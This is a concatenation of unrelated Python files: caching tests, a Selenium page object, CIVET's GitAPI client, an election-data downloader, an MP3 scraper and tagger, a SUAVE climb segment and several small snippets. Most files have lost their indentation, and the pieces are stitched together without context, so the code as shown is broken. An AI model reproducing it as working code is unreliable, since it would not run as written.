assert foo1_2 is foo1.foo(2)
assert foo2_1 is foo2.foo(1)
assert foo2_2 is foo2.foo(2)
foo1.foo.cache_clear()
foo2.foo.cache_pop(1)
assert foo1_1 is not foo1.foo(1)
assert foo1_2 is not foo1.foo(2)
assert foo2_1 is not foo2.foo(1)
assert foo2_2 is foo2.foo(2)
def test_timecache_getattr():
ts = 0
def get_ts():
return ts
class Foo:
def __init__(self):
self.count = 0
@timecache(expiration=1, get_ts_func=get_ts)
def __getattr__(self, name):
self.count += 1
return [self.count, name]
foo = Foo()
assert foo.bar == [1, 'bar']
assert foo.bar == [1, 'bar']
assert foo.baz == [2, 'baz']
ts += 1
assert foo.baz == [3, 'baz']
assert foo.bar == [4, 'bar']
@pytest.yield_fixture()
def persistent_cache_path():
cache_path = '/tmp/test_pcache_%s' % uuid4()
try:
yield cache_path
finally:
try:
os.unlink("%s.db" % cache_path)
except: # noqa
pass
def test_persistent_cache(persistent_cache_path):
ps = PersistentCache(persistent_cache_path, version=1)
TEST_KEY = "test_key"
TEST_VALUE = "test_value"
ps.set(TEST_KEY, TEST_VALUE)
assert ps.get(TEST_KEY) == TEST_VALUE, "Value does not match set value"
ps = PersistentCache(persistent_cache_path, version=1)
assert ps.get(TEST_KEY) == TEST_VALUE, "Value does not match set value after reopen"
ps = PersistentCache(persistent_cache_path, version=2)
with pytest.raises(KeyError): # Changed version should invalidate cache
ps.get(TEST_KEY)
# Default values
    assert ps.get(TEST_KEY, default=None) is None, "Wrong default value returned (not None)"
assert ps.get(TEST_KEY, default="1") == "1", "Wrong default value returned"
# Cached func should be called only once
value_generated = False
use_cache = True
class UnnecessaryFunctionCall(Exception):
pass
ps = PersistentCache(persistent_cache_path, version=2, ignored_keywords="x")
@ps(validator=lambda _, **__: use_cache)
def cached_func(x):
nonlocal value_generated
if value_generated:
raise UnnecessaryFunctionCall()
value_generated = True
return True
assert cached_func(x=random.random()) is cached_func(x=random.random())
assert value_generated
# Testing validator
use_cache = False
with pytest.raises(UnnecessaryFunctionCall):
cached_func(x=random.random())
# Removing data
ps.clear()
assert ps.get(TEST_KEY, default=None) is None, "Database was not cleared properly"
# Expiration
ps = PersistentCache(persistent_cache_path, version=3, expiration=.01)
ps.set(TEST_KEY, TEST_VALUE)
time.sleep(0.011)
assert ps.get(TEST_KEY, None) is None, "Database was not cleaned up on expiration"
def test_locking_timecache():
from easypy.concurrency import MultiObject
# Cached func should be called only once
value_generated = False
class UnnecessaryFunctionCall(Exception):
pass
@timecache(ignored_keywords='x')
def test(x):
nonlocal value_generated
if value_generated:
raise UnnecessaryFunctionCall()
value_generated = True
return True
MultiObject(range(10)).call(lambda x: test(x=x))
@pytest.mark.parametrize('cache_decorator', [cached_property, timecache()])
def test_caching_gc_leaks(cache_decorator):
"""
Make sure that the cache does not prevent GC collection once the original objects die
"""
class Leaked():
pass
class Foo:
@cache_decorator
def cached_method(self):
return Leaked()
def get(self):
"""Generalize property type and function type caches"""
result = self.cached_method
if callable(result):
result = result()
assert isinstance(result, Leaked), 'cache not used properly - got wrong value %s' % (result,)
return result
foo = Foo()
leaked = weakref.ref(foo.get())
gc.collect()
assert leaked() == foo.get()
del foo
gc.collect()
assert leaked() is None
def test_resilient_between_timecaches():
class ExceptionLeakedThroughResilient(Exception):
pass
@timecache(1)
@resilient(acceptable=ExceptionLeakedThroughResilient, default='default')
@timecache(1)
def foo():
raise ExceptionLeakedThroughResilient()
assert foo() == 'default'
|
from php4dvd.pages.page import Page
from selenium.webdriver.common.by import By
class MovieForm(Page):
@property
def movietitle_field(self):
return self.driver.find_element_by_name("name")
@property
def movieyear_field(self):
return self.driver.find_element_by_name("year")
@property
def movieformat_field(self):
return self.driver.find_element_by_id("formats")
@property
def submit_button(self):
return self.driver.find_element_by_name("submit")
@property
def is_this_page(self):
return self.is_element_visible((By.CSS_SELECTOR, "img[alt='Save']"))
|
# Copyright 2016 Battelle Energy Alliance, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import unicode_literals, absolute_import
import abc
class GitException(Exception):
pass
import logging
import json
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
logger = logging.getLogger('ci')
def copydoc(fromfunc, sep="\n"):
"""
Decorator: Copy the docstring of `fromfunc`
"""
def _decorator(func):
sourcedoc = fromfunc.__doc__
        if func.__doc__ is None:
func.__doc__ = sourcedoc
else:
func.__doc__ = sep.join([sourcedoc, func.__doc__])
return func
return _decorator
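# A minimal usage sketch of copydoc (illustrative names, not part of CIVET):
# `child` inherits `parent`'s docstring; had `child` already carried a
# docstring of its own, the two would be joined with `sep`.
if __name__ == "__main__":
    def parent():
        """Parent docstring."""
    @copydoc(parent)
    def child():
        pass
    assert child.__doc__ == "Parent docstring."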
class GitAPI(object):
__metaclass__ = abc.ABCMeta
PENDING = 0
ERROR = 1
SUCCESS = 2
FAILURE = 3
RUNNING = 4
CANCELED = 5
STATUS_JOB_STARTED = 0
STATUS_JOB_COMPLETE = 1
STATUS_START_RUNNING = 2
STATUS_CONTINUE_RUNNING = 3
def __init__(self, config, access_user=None, token=None):
super(GitAPI, self).__init__()
self._config = config
self._access_user = access_user
self._token = token
self._request_timeout = config.get("request_timeout", 5)
self._install_webhook = config.get("install_webhook", False)
self._update_remote = config.get("remote_update", False)
self._remove_pr_labels = config.get("remove_pr_label_prefix", [])
self._ssl_cert = config.get("ssl_cert", True)
self._civet_url = config.get("civet_base_url", "")
self._headers = {"User-Agent": "INL-CIVET/1.0 (+https://github.com/idaholab/civet)"}
self._errors = []
self._per_page = 50
self._per_page_key = "per_page"
self._default_params = {}
self._get_params = {}
self._bad_response = False
self._session = None
def _timeout(self, timeout):
"""
Utility function to get the timeout value used in requests
"""
if timeout is None:
return self._request_timeout
return timeout
def _response_to_str(self, response):
return "Status code: %s\nReason: %s\nJSON response:\n%s" % \
(response.status_code, response.reason, self._format_json(response.json()))
def _format_json(self, data):
return json.dumps(data, indent=2)
def _params(self, params, get=False):
"""
        Merges all the available parameters into a single dictionary
"""
if params is None:
return self._default_params
if isinstance(params, dict):
params.update(self._default_params)
if get:
params.update(self._get_params)
return params
def errors(self):
return self._errors
    def _response_exception(self, url, method, e, data=None, params=None):
        data_str = ""
        if data:
            data_str = "Sent data:\n%s\n" % self._format_json(data)
        param_str = ""
        if params:
            param_str = "Sent params:\n%s\n" % self._format_json(params)
msg = "Response exception:\nURL: %s\nMETHOD: %s\n%s%sError: %s" % (
url, method, param_str, data_str, e)
self._add_error(msg)
self._bad_response = True
def _add_error(self, err_str, log=True):
"""
Adds an error string to the internal list of errors and log it.
"""
self._errors.append(err_str)
if log:
logger.warning(err_str)
def _check_response(self, response, params={}, data={}, log=True):
try:
response.raise_for_status()
except Exception as e:
params_str = ""
if params:
params_str = "Params:\n%s\n" % self._format_json(params)
data_str = ""
if data:
data_str = "Data:\n%s\n" % self._format_json(data)
headers = ""
if self._headers:
headers = "Headers:\n%s\n" % self._format_json(self._headers)
self._add_error("Bad response %s\nURL: %s\nMETHOD: %s\n%s%s%s%s\n%s\n%s"
% ("-"*50,
response.request.url,
response.request.method,
params_str,
data_str,
headers,
self._response_to_str(response),
e,
"-"*50),
log)
self._bad_response = True
return response
def get(self, url, params=None, timeout=None, log=True):
"""
Get the URL.
Input:
url[str]: URL to get
params[dict]: Dictionary of extra parameters to send in the request
timeout[int]: Specify a timeout other than the default.
Return:
            requests.Response or None if there was a requests exception
"""
self._bad_response = False
try:
timeout = self._timeout(timeout)
params = self._params(params, True)
response = self._session.get(url,
params=params, timeout=timeout, headers=self._headers, verify=self._ssl_cert)
except Exception as e:
return self._response_exception(url, "GET", e, params=params)
return self._check_response(response, params=params, log=log)
def post(self, url, params=None, data=None, timeout=None, log=True):
"""
Post to a URL.
Input:
url[str]: URL to POST to.
data[dict]: Dictionary of data to post
timeout[int]: Specify a timeout other than the default.
Return:
            requests.Response or None if there was a requests exception
"""
self._bad_response = False
try:
timeout = self._timeout(timeout)
params = self._params(params)
response = self._session.post(url,
params=params,
json=data,
timeout=timeout,
headers=self._headers,
verify=self._ssl_cert)
except Exception as e:
return self._response_exception(url, "POST", e, data=data, params=params)
return self._check_response(response, params=params, data=data, log=log)
def patch(self, url, params=None, data=None, timeout=None, log=True):
"""
Patch a URL.
Input:
url[str]: URL to PATCH
timeout[int]: Specify a timeout other than the default.
Return:
            requests.Response or None if there were any problems
"""
self._bad_response = False
params = self._params(params)
try:
timeout = self._timeout(timeout)
response = self._session.patch(url,
params=params,
json=data,
timeout=timeout,
headers=self._headers,
verify=self._ssl_cert)
except Exception as e:
return self._response_exception(url, "PATCH", e, data=data, params=params)
return self._check_response(response, params, data, log)
def put(self, url, params=None, data=None, timeout=None, log=True):
"""
Do a Put on a URL.
Input:
url[str]: URL to PATCH
timeout[int]: Specify a timeout other than the default.
Return:
            requests.Response or None if there were any problems
"""
self._bad_response = False
params = self._params(params)
try:
timeout = self._timeout(timeout)
response = self._session.put(url,
params=params,
json=data,
timeout=timeout,
headers=self._headers,
verify=self._ssl_cert)
except Exception as e:
return self._response_exception(url, "PUT", e, data=data, params=params)
return self._check_response(response, params, data, log)
def delete(self, url, timeout=None, log=True):
"""
Delete a URL.
Input:
url[str]: URL to DELETE
timeout[int]: Specify a timeout other than the default.
Return:
            requests.Response or None if there were any problems
"""
self._bad_response = False
try:
timeout = self._timeout(timeout)
response = self._session.delete(url,
params=self._default_params,
timeout=timeout,
headers=self._headers,
verify=self._ssl_cert)
except Exception as e:
return self._response_exception(url, "DELETE", e, params=self._default_params)
return self._check_response(response, self._default_params, log=log)
def get_all_pages(self, url, params=None, timeout=None, log=True):
"""
Get all the pages for a URL by following the "next" links on a response.
Input:
url[str]: URL to get
params[dict]: Dictionary of extra parameters to send in the request
timeout[int]: Specify a timeout other than the default.
Return:
            list: list of JSON results, or None if there were any problems
"""
if params is None:
params = {}
params[self._per_page_key] = self._per_page
response = self.get(url, params=params, timeout=timeout, log=log)
if response is None or self._bad_response:
return None
all_json = response.json()
try:
while 'next' in response.links:
response = self.get(response.links["next"]["url"],
params=params, timeout=timeout, log=log)
if not self._bad_response and response:
all_json.extend(response.json())
else:
break
except Exception as e:
self._add_error("Error getting multiple pages at %s\nSent data:\n%s\nError: %s" % (
url, self._format_json(params), e), log)
return all_json
@abc.abstractmethod
def sign_in_url(self):
"""
Gets the URL to allow the user to sign in.
Return:
str: URL
"""
@abc.abstractmethod
def get_all_repos(self, owner):
"""
Get a list of repositories the user has access to
Input:
owner[str]: user to check against
Return:
list[str]: Each entry is "<owner>/<repo name>"
"""
@abc.abstractmethod
def get_repos(self, session):
"""
Get a list of repositories that the signed in user has access to.
Input:
session[HttpRequest.session]: session of the request. Used as a cache of the repositories.
Return:
list[str]: Each entry is "<owner>/<repo name>"
"""
@abc.abstractmethod
def get_branches(self, owner, repo):
"""
Get a list of branches for a repository
Input:
owner[str]: owner of the repository
repo[str]: name of the repository
Return:
list[str]: Each entry is the name of a branch
"""
@abc.abstractmethod
def update_pr_status(self, base, head, state, event_url, description, context, job_stage):
"""
Update the PR status.
Input:
base[models.Commit]: Original commit
head[models.Commit]: New commit
state[int]: One of the states defined as class variables above
event_url[str]: URL back to the moosebuild page
            description[str]: Description of the update
context[str]: Context for the update
job_stage[int]: One of the STATUS_* flags
"""
@abc.abstractmethod
def is_collaborator(self, user, repo):
"""
Check to see if the signed in user is a collaborator on a repo
Input:
user[models.GitUser]: User to check against
repo[models.Repository]: Repository to check against
Return:
bool: True if user is a collaborator on repo, False otherwise
"""
@abc.abstractmethod
def pr_review_comment(self, url, sha, filepath, position, msg):
"""
Leave a review comment on a PR for a specific hash, on a specific position of a file
Input:
url[str]: URL to post the message to
sha[str]: SHA of the PR branch to attach the message to
filepath[str]: Filepath of the file to attach the message to
position[str]: Position in the diff to attach the message to
msg[str]: Comment
"""
@abc.abstractmethod
def pr_comment(self, url, msg):
"""
Leave a comment on a PR
Input:
url[str]: URL to post the message to
msg[str]: Comment
"""
@abc.abstractmethod
def last_sha(self, owner, repo, branch):
"""
Get the latest SHA for a branch
Input:
owner[str]: owner of the repository
repo[str]: name of the repository
branch[str]: name of the branch
Return:
str: Last SHA of the branch or None if there was a problem
"""
@abc.abstractmethod
def install_webhooks(self, user, repo):
"""
Updates the webhook for this server on GitHub.
Input:
user[models.GitUser]: the user trying to update the web hooks.
repo[models.Repository]: the repository to set the web hook on.
Raises:
GitException if there are any errors.
"""
@abc.abstractmethod
def repo_html_url(self, owner, repo):
"""
Gets a URL to the repository
Input:
owner[str]: Owner of the repo
repo[str]: Name of the repo
Return:
str: URL on the gitserver to the repo
"""
@abc.abstractmethod
def branch_html_url(self, owner, repo, branch):
"""
Gets a URL to the branch
Input:
owner[str]: Owner of the repo
repo[str]: Name of the repo
branch[str]: Name of the branch
Return:
str: URL on the gitserver to the branch
"""
@abc.abstractmethod
def commit_html_url(self, owner, repo, sha):
"""
Gets a URL to a commit
Input:
            owner[str]: Owner of the repo
            repo[str]: Name of the repo
            sha[str]: SHA of the commit on the repo
Return:
str: URL on the gitserver to the commit
"""
@abc.abstractmethod
def add_pr_label(self, repo, pr_num, label_name):
"""
Add a label to a PR
Input:
repo[models.Repository]: Repository of the PR
pr_num[int]: PR number
label_name[str]: Text of the label
"""
@abc.abstractmethod
def remove_pr_label(self, repo, pr_num, label_name):
"""
Remove a label from a PR
Input:
repo[models.Repository]: Repository of the PR
pr_num[int]: PR number
label_name[str]: Text of the label
"""
@abc.abstractmethod
def get_pr_comments(self, url, username, comment_re):
"""
        Get a list of comments authored by a user that match a regular expression.
Input:
url[str]: URL to get comments from
username[str]: Username that authored comments
comment_re[str]: Regular expression to match against the body of comments
Return:
list[dict]: Comments
"""
@abc.abstractmethod
def remove_pr_comment(self, comment):
"""
Remove a comment on a PR
Input:
comment[dict]: Git server information as returned by get_pr_comments()
"""
@abc.abstractmethod
def edit_pr_comment(self, comment, msg):
"""
Edit an existing comment on a PR
Input:
comment[dict]: Git server information as returned by get_pr_comments()
msg[str]: New comment body
"""
@abc.abstractmethod
def is_member(self, team, user):
"""
Checks to see if a user is a member of a team/org/group
Input:
team[str]: Name of the team/org/group
user[models.GitUser]: User to check
"""
@abc.abstractmethod
def get_open_prs(self, owner, repo):
"""
Get a list of open PRs for a repo
Input:
owner[str]: owner name
repo[str]: repo name
Return:
list[dict]: None can be returned on error.
Each dict will have the following key/value pairs:
number[int]: PR number
title[str]: Title of the PR
html_url[str]: URL to the PR
"""
@abc.abstractmethod
    def create_or_update_issue(self, owner, repo, title, body, new_comment):
"""
If an open issue with the given title exists, then update it.
Otherwise create a new issue.
The issue will be created by the user that created the GitAPI.
Input:
owner[str]: owner of the repository to create/update the issue on
repo[str]: repository to create/update the issue on
title[str]: title of issue
body[str]: body of issue
new_comment[bool]: If true, create a new comment. Else just update the issue body
"""
@abc.abstractmethod
def automerge(self, repo, pr_num):
"""
See if a PR can be automerged.
Input:
repo[models.Repository]: repository to create/update the issue on
pr_num[str]: Number of the PR
"""
|
#--- Exercise 3 - Functions - 1
#--- Write a function that reads three float numbers
#--- Store each value read in its own variable
#--- Compute the average of the three numbers and store it in a fourth variable
#--- Print the average and a message using an f-string (module 3)
#--- Only two decimal places should be printed
n1 = ''
n2 = ''
n3 = ''
med = '0'
def media(n1, n2, n3, med):
    n1 = float(input('Informe o 1 Número'))
    n2 = float(input('Informe o 2 Número'))
    n3 = float(input('Informe o 3 Número'))
    med = (n1 + n2 + n3) / 3
    return print(f'A média entre {n1} , {n2} e {n3} é: {med:.2f}')
media(n1, n2, n3, med)
|
import requests
# We have to define our own download function using requests, as the plain
# urlretrieve is blocked by the server :(
def urlretrieve(url, filename):
r = requests.get(url)
with open(filename, "wb") as f:
f.write(r.content)
def download_election_results():
# Kreiswahl
urlretrieve("https://votemanager-gi.ekom21cdn.de/2021-03-14/06534000/html5/Open-Data-Kreiswahl-Hessen3021.csv",
"data/kreiswahl_gesamt.csv")
urlretrieve("https://votemanager-gi.ekom21cdn.de/2021-03-14/06534000/html5/Open-Data-Kreiswahl-Hessen3023.csv",
"data/kreiswahl_gemeinden.csv")
urlretrieve("https://votemanager-gi.ekom21cdn.de/2021-03-14/06534000/html5/OpenDataInfo.html",
"data/beschreibung_kreiswahl.html")
# Stadtverordnetenwahl Marburg
urlretrieve("https://votemanager-gi.ekom21cdn.de/2021-03-14/06534014/html5/Open-Data-Gemeindewahl-Hessen3033.csv",
"data/stv_marburg_gesamt.csv")
urlretrieve("https://votemanager-gi.ekom21cdn.de/2021-03-14/06534014/html5/Open-Data-Gemeindewahl-Hessen3038.csv",
"data/stv_marburg_ortsbezirke.csv")
urlretrieve("https://votemanager-gi.ekom21cdn.de/2021-03-14/06534014/html5/Open-Data-Gemeindewahl-Hessen3036.csv",
"data/stv_marburg_wahlbezirke.csv")
urlretrieve("https://votemanager-gi.ekom21cdn.de/2021-03-14/06534014/html5/OpenDataInfo.html",
"data/beschreibung_stv_marburg.html")
if __name__ == "__main__":
download_election_results()
|
# pandastrick4.py
import pandas as pd
weekly_data = {'day':['Monday','Tuesday', 'Wednesday', 'Thursday',
'Friday', 'Saturday', 'Sunday'],
'temp':[40, 33, 42, 31, 41, 40, 30],
'condition':['Sunny','Cloudy','Sunny','Rainy','Sunny',
'Cloudy','Rainy']
}
df = pd.DataFrame(weekly_data)
print(df[(df.condition == 'Rainy') | (df.condition == 'Sunny')])
print(df[df['condition'].str.contains('Rainy|Sunny')])
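# Equivalent selection with isin(), which avoids both the chained boolean OR
# and the regex inside str.contains(); all three prints show the same rows.
print(df[df['condition'].isin(['Rainy', 'Sunny'])])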
|
import dataclasses
from typing import Any, Optional, Union
class TaskType:
ASSET_PURCHASE_REQUEST_PROCESSING = 'asset_purchase_request_processing'
ASSET_CHANGE_REQUEST_PROCESSING = 'asset_change_request_processing'
ASSET_SUSPEND_REQUEST_PROCESSING = 'asset_suspend_request_processing'
ASSET_RESUME_REQUEST_PROCESSING = 'asset_resume_request_processing'
ASSET_CANCEL_REQUEST_PROCESSING = 'asset_cancel_request_processing'
ASSET_ADJUSTMENT_REQUEST_PROCESSING = 'asset_adjustment_request_processing'
ASSET_PURCHASE_REQUEST_VALIDATION = 'asset_purchase_request_validation'
ASSET_CHANGE_REQUEST_VALIDATION = 'asset_change_request_validation'
ASSET_SUSPEND_REQUEST_VALIDATION = 'asset_suspend_request_validation'
ASSET_RESUME_REQUEST_VALIDATION = 'asset_resume_request_validation'
ASSET_CANCEL_REQUEST_VALIDATION = 'asset_cancel_request_validation'
ASSET_ADJUSTMENT_REQUEST_VALIDATION = 'asset_adjustment_request_validation'
PRODUCT_ACTION_EXECUTION = 'product_action_execution'
PRODUCT_CUSTOM_EVENT_PROCESSING = 'product_custom_event_processing'
TIER_CONFIG_SETUP_REQUEST_PROCESSING = 'tier_config_setup_request_processing'
TIER_CONFIG_CHANGE_REQUEST_PROCESSING = 'tier_config_change_request_processing'
TIER_CONFIG_ADJUSTMENT_REQUEST_PROCESSING = 'tier_config_adjustment_request_processing'
TIER_CONFIG_SETUP_REQUEST_VALIDATION = 'tier_config_setup_request_validation'
TIER_CONFIG_CHANGE_REQUEST_VALIDATION = 'tier_config_change_request_validation'
TIER_CONFIG_ADJUSTMENT_REQUEST_VALIDATION = 'tier_config_adjustment_request_validation'
class MessageType:
CAPABILITIES = 'capabilities'
CONFIGURATION = 'configuration'
TASK = 'task'
PAUSE = 'pause'
RESUME = 'resume'
SHUTDOWN = 'shutdown'
class TaskCategory:
BACKGROUND = 'background'
INTERACTIVE = 'interactive'
class ResultType:
SUCCESS = 'success'
RESCHEDULE = 'reschedule'
SKIP = 'skip'
RETRY = 'retry'
FAIL = 'fail'
@dataclasses.dataclass
class TaskPayload:
task_id: str
task_category: str
task_type: str
object_id: str
    result: Optional[str] = None
    data: Any = None
    countdown: int = 0
    failure_output: Optional[str] = None
    correlation_id: Optional[str] = None
    reply_to: Optional[str] = None
def to_json(self):
return dataclasses.asdict(self)
@dataclasses.dataclass
class ConfigurationPayload:
    configuration: Optional[dict] = None
    logging_api_key: Optional[str] = None
def to_json(self):
return dataclasses.asdict(self)
@dataclasses.dataclass
class CapabilitiesPayload:
capabilities: dict
    readme_url: Optional[str] = None
    changelog_url: Optional[str] = None
def to_json(self):
return dataclasses.asdict(self)
@dataclasses.dataclass(init=False)
class Message:
message_type: str
data: Optional[Union[CapabilitiesPayload, ConfigurationPayload, TaskPayload]] = None
def __init__(self, message_type=None, data=None):
self.message_type = message_type
if isinstance(data, dict):
if self.message_type == MessageType.CONFIGURATION:
self.data = ConfigurationPayload(**data)
elif self.message_type == MessageType.TASK:
self.data = TaskPayload(**data)
elif self.message_type == MessageType.CAPABILITIES:
self.data = CapabilitiesPayload(**data)
else:
self.data = data
def to_json(self):
payload = {'message_type': self.message_type}
if self.data:
payload['data'] = dataclasses.asdict(self.data)
return payload
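# A small usage sketch (the IDs are illustrative): passing a raw dict as
# `data` promotes it to the dataclass matching `message_type`, and to_json()
# flattens the whole message back into plain dicts.
if __name__ == '__main__':
    msg = Message(
        message_type=MessageType.TASK,
        data={
            'task_id': 'TQ-000',
            'task_category': TaskCategory.BACKGROUND,
            'task_type': TaskType.PRODUCT_ACTION_EXECUTION,
            'object_id': 'PR-000',
        },
    )
    assert isinstance(msg.data, TaskPayload)
    print(msg.to_json())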
|
from application.src.db.interface import DBInterface
class Countries(DBInterface):
display_table_name = "countries";
class Continents(DBInterface):
display_table_name = "continents";
|
import json
class TiledImport:
def __init__(self):
self.width = 0
self.height = 0
self.layers = []
@property
def num_layers(self):
return len(self.layers)
def load(self, filename):
with open(filename) as fp:
data = json.load(fp)
self.layers = [l["data"] for l in sorted(data["layers"], key=lambda l: l["name"])]
self.width = data["width"]
self.height = data["height"]
if __name__ == "__main__":
t = TiledImport()
t.load("./assets/tiled/level01.json")
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2014 eNovance Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
class ToozError(Exception):
"""Exception raised when an internal error occurs.
Raised for instance in case of server internal error.
:ivar cause: the cause of the exception being raised, when not none this
will itself be an exception instance, this is useful for
creating a chain of exceptions for versions of python where
this is not yet implemented/supported natively.
"""
def __init__(self, message, cause=None):
super(ToozError, self).__init__(message)
self.cause = cause
class NotImplemented(NotImplementedError, ToozError):
pass
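# Illustrative usage only (not part of tooz's API): wrap a low-level error
# while keeping it reachable through the ``cause`` attribute.
if __name__ == "__main__":
    try:
        raise IOError("connection reset")
    except IOError as inner:
        err = ToozError("server internal error", cause=inner)
        assert err.cause is inner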
|
#! /usr/bin/python
# coding=UTF-8
"""
Fetches the MP3 files from playingthechanges.com to import into iTunes.
Author: Mike Bland (mbland@acm.org)
http://mike-bland.com/
Date: 2014-03-13
License: Creative Commons Attribution 4.0 International (CC By 4.0)
http://creativecommons.org/licenses/by/4.0/deed.en_US
Grabs all the MP3 links from the http://playingthechanges.com/ page and
downloads each file into the current directory, then updates the tag info for
each MP3.
If you don't have the requests module installed, you may need to
install pip, the Python Package Index installer:
https://pypi.python.org/pypi
http://www.pip-installer.org/en/latest/installing.html
Then:
$ sudo pip install requests
Requires the id3lib tools. For OS X, install Homebrew: http://brew.sh/
Then:
$ brew install id3lib
Written with hints from:
http://ubuntuforums.org/showthread.php?t=1542894
http://docs.python-requests.org/en/latest/user/quickstart/
More info:
http://mike-bland.com/2014/03/17/playing-the-changes-hack-continued.html
"""
import contextlib
import os
import os.path
import re
import requests
import subprocess
import sys
PTC_COM='http://www.playingthechanges.com'
ROOT_WEIGHTS = {
'C': 0,
'F': 1,
'Bb': 2,
'Eb': 3,
'Ab': 4,
'Db': 5,
'Fsharp': 6,
'B': 7,
'E': 8,
'A': 9,
'D': 10,
'G': 11,
}
SUFFIX_WEIGHTS = {
'Maj7': 0,
'min7': 1,
'7': 2,
'min7b5': 3,
'7b9b13': 4,
'7b913': 5,
}
# I'd intended to use the proper unicode flat (U+266D) and sharp (U+266F),
# but iTunes doesn't grok them.
ROOT_REWRITES = {
'C': 'C',
'F': 'F',
'Bb': 'Bb',
'Eb': 'Eb',
'Ab': 'Ab',
'Db': 'Db',
'Fsharp': 'F#',
'B': 'B',
'E': 'E',
'A': 'A',
'D': 'D',
'G': 'G',
}
SUFFIX_REWRITES = {
'Maj7': 'Maj7',
'min7': '-7',
'7': '7',
'min7b5': '-7(b5)',
'7b9b13': '7(b9,b13)',
'7b913': '7(b9,13)',
}
def FetchPtcFiles():
"""Scrapes and fetches the list of MP3 files from playingthechanges.com."""
with contextlib.closing(requests.get('%s/' % PTC_COM)) as index_page:
mp3_links = re.findall('downloads/.*\.mp3', index_page.text)
for i, link in enumerate(mp3_links):
print 'Fetching %2d of %d: %s' % (i + 1, len(mp3_links), link)
with contextlib.closing(requests.get('%s/%s' % (PTC_COM, link))) as mp3:
with open(os.path.basename(link), 'wb') as fd:
for chunk in mp3.iter_content(1<<20):
fd.write(chunk)
class BadChordFileNameException(Exception):
"""Raised when a chord file name does not match the expected format."""
pass
def SplitFileName(file_name):
"""Returns the tuple (root, suffix) based on a chord's file name.
Args:
file_name: corresponds to a chord file from playingthechanges.com
Returns:
a (chord root, chord suffix) tuple
Raises:
BadChordFileNameException: if the file does not end with .mp3 or if either
the chord root or chord suffix does not correspond to an expected value
within ROOT_WEIGHTS and SUFFIX_WEIGHTS, respectively
"""
kMp3Suffix = '.mp3'
if not file_name.endswith(kMp3Suffix):
raise BadChordFileNameException('Bad chord file name: %s' % file_name)
suffix_start = 1
if file_name[1] == 'b':
suffix_start = 2
elif file_name.startswith('sharp', 1):
suffix_start = 6
root = file_name[:suffix_start]
suffix = file_name[suffix_start:-len(kMp3Suffix)]
if root not in ROOT_WEIGHTS:
raise BadChordFileNameException('Unknown chord root in file name: %s' %
file_name)
if suffix not in SUFFIX_WEIGHTS:
raise BadChordFileNameException('Unknown chord suffix in file name: %s' %
file_name)
return (root, suffix)
def CompareChordFileNames(lhs, rhs):
"""Defines an ordering for split chord file names.
Suffix order weight trumps root order. Root order is defined by walking the
circle of fourths up from C. Both are defined in ROOT_WEIGHTS and
SUFFIX_WEIGHTS.
Args:
lhs: left-hand tuple of (root, suffix)
rhs: right-hand tuple of (root, suffix)
Returns:
-1 if lhs < rhs
0 if lhs == rhs
1 if lhs > rhs
"""
return (cmp(SUFFIX_WEIGHTS[lhs[1]], SUFFIX_WEIGHTS[rhs[1]]) or
cmp(ROOT_WEIGHTS[lhs[0]], ROOT_WEIGHTS[rhs[0]]))
def ChordName(file_name):
"""Generates the chord name from the (root, suffix) file name tuple."""
return u'%s%s' % (ROOT_REWRITES[file_name[0]], SUFFIX_REWRITES[file_name[1]])
def UpdateMp3Tags():
mp3s = [SplitFileName(i) for i in os.listdir('.') if i.endswith('.mp3')]
mp3s.sort(CompareChordFileNames)
for i, mp3 in enumerate(mp3s):
mp3_file = '%s%s.mp3' % mp3
print 'Updating: %s' % mp3_file
command = ['/usr/local/bin/id3tag',
'--artist=Paul Del Nero',
'--album=Playing the Changes',
'--song=%s' % ChordName(mp3),
'--track=%d' % (i + 1),
'--total=%d' % len(mp3s),
mp3_file]
return_code = subprocess.call(command)
if return_code:
print >> sys.stderr, ('Error updating %s (return code %d) with '
'command: %s' % (mp3_file, return_code, ' '.join(command)))
sys.exit(return_code)
print "Updated %d mp3%s" % (len(mp3s), len(mp3s) != 1 and 's' or '')
if __name__ == '__main__':
FetchPtcFiles()
UpdateMp3Tags()
|
nums = {
1: "one",
2: "two",
3: "three",
}
print(1 in nums)
print("three" in nums)
print(4 not in nums)
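# dict.get complements the membership checks above: it returns a default
# instead of raising KeyError when the key is missing.
print(nums.get(4, "no such key"))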
|
## @ingroup Analyses-Mission-Segments-Climb
# Constant_CAS_Constant_Rate.py
#
# Created: Nov 2020, S. Karpuk
# Modified: Aug 2021, J. Mukhopadhaya
#
# Adapted from Constant_Speed_Constant_Rate
# ----------------------------------------------------------------------
# Imports
# ----------------------------------------------------------------------
# SUAVE imports
from SUAVE.Methods.Missions import Segments as Methods
from .Unknown_Throttle import Unknown_Throttle
# Units
from SUAVE.Core import Units
# ----------------------------------------------------------------------
# Segment
# ----------------------------------------------------------------------
## @ingroup Analyses-Mission-Segments-Climb
class Constant_CAS_Constant_Rate(Unknown_Throttle):
""" Climb at a constant Calibrated Airspeed (CAS) at a constant rate.
Assumptions:
None
Source:
None
"""
def __defaults__(self):
""" This sets the default solver flow. Anything in here can be modified after initializing a segment.
Assumptions:
None
Source:
N/A
Inputs:
None
Outputs:
None
Properties Used:
None
"""
# --------------------------------------------------------------
# User inputs
# --------------------------------------------------------------
self.altitude_start = None # Optional
self.altitude_end = 10. * Units.km
self.climb_rate = 3. * Units.m / Units.s
self.calibrated_air_speed = 100 * Units.m / Units.s
# --------------------------------------------------------------
# The Solving Process
# --------------------------------------------------------------
initialize = self.process.initialize
initialize.conditions = Methods.Climb.Constant_CAS_Constant_Rate.initialize_conditions
self.process.initialize = initialize
return
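# ----------------------------------------------------------------------
#   Usage sketch
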